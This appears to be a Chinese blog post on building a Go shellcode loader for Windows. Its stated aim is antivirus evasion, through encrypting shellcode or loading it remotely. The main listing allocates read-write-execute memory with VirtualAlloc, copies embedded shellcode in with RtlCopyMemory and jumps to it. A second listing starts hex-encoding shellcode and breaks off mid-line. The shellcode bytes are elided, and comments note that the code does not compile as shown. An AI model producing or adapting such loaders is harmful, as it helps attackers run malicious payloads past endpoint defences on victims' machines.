Go加载器
网上找的Go加载器,最简单的免杀就是将shellcode加密解密,或者远程加载shellcode。
package main
import (
"syscall"
"unsafe"
)
// Win32 VirtualAlloc arguments used by main: the allocation-type flags and
// the page protection. PAGE_EXECUTE_READWRITE asks for a region that is
// writable and executable at the same time (RWX), a combination that
// memory scanners and EDR API monitors commonly treat as suspicious.
const (
MEM_COMMIT = 0x1000 // back the reserved range with physical storage
MEM_RESERVE = 0x2000 // reserve the virtual address range
PAGE_EXECUTE_READWRITE = 0x40 // RWX page protection
)
// Win32 entry points resolved at package init. MustLoadDLL and MustFindProc
// panic when the DLL or the export cannot be found, so on a system that
// lacks them the program aborts before main runs.
var (
kernel32 = syscall.MustLoadDLL("kernel32.dll")
ntdll = syscall.MustLoadDLL("ntdll.dll")
VirtualAlloc = kernel32.MustFindProc("VirtualAlloc")
RtlCopyMemory = ntdll.MustFindProc("RtlCopyMemory")
)
// main allocates an RWX buffer, copies the embedded byte slice into it and
// then calls into that buffer. This allocate / copy / execute sequence is
// the textbook in-process payload execution pattern that endpoint detection
// products look for through API hooking and memory scanning.
func main() {
// The "..." is the author's elision; the listing does not compile as shown.
// Despite the variable name, nothing in this block XOR-decodes the bytes.
xor_shellcode := []byte{0xfc, 0x48, 0x83, ...}
// VirtualAlloc(NULL, len, MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE):
// the system chooses the address; the region is RWX from the start.
addr, _, err := VirtualAlloc.Call(0, uintptr(len(xor_shellcode)), MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE)
// Proc.Call always returns a non-nil error; the string compare is how the
// author skips the ERROR_SUCCESS status text. On any other error the
// process exits with status 0 and leaves no diagnostic.
if err != nil && err.Error() != "The operation completed successfully." {
syscall.Exit(0)
}
// RtlCopyMemory(dst=addr, src=&xor_shellcode[0], n=len): writes the bytes
// into the executable region.
_, _, err = RtlCopyMemory.Call(addr, (uintptr)(unsafe.Pointer(&xor_shellcode[0])), uintptr(len(xor_shellcode)))
if err != nil && err.Error() != "The operation completed successfully." {
syscall.Exit(0)
}
// Invokes addr as a zero-argument function, i.e. transfers control to the
// bytes just copied into the RWX region.
syscall.Syscall(addr, 0, 0, 0, 0)
}
shellcode加密解密
简单的加密解密,可以把[]byte类型的shellcode->16进制字符串,Go代码如下。【网络安全学习攻略】
package main
import (
"bytes"
"encoding/hex"
"fmt"
)
func main() {
//将[]byte -> string(16进制)
shellcode := []byte{0xfc,0x48,0x83, ...}
s := hex.EncodeToString(shel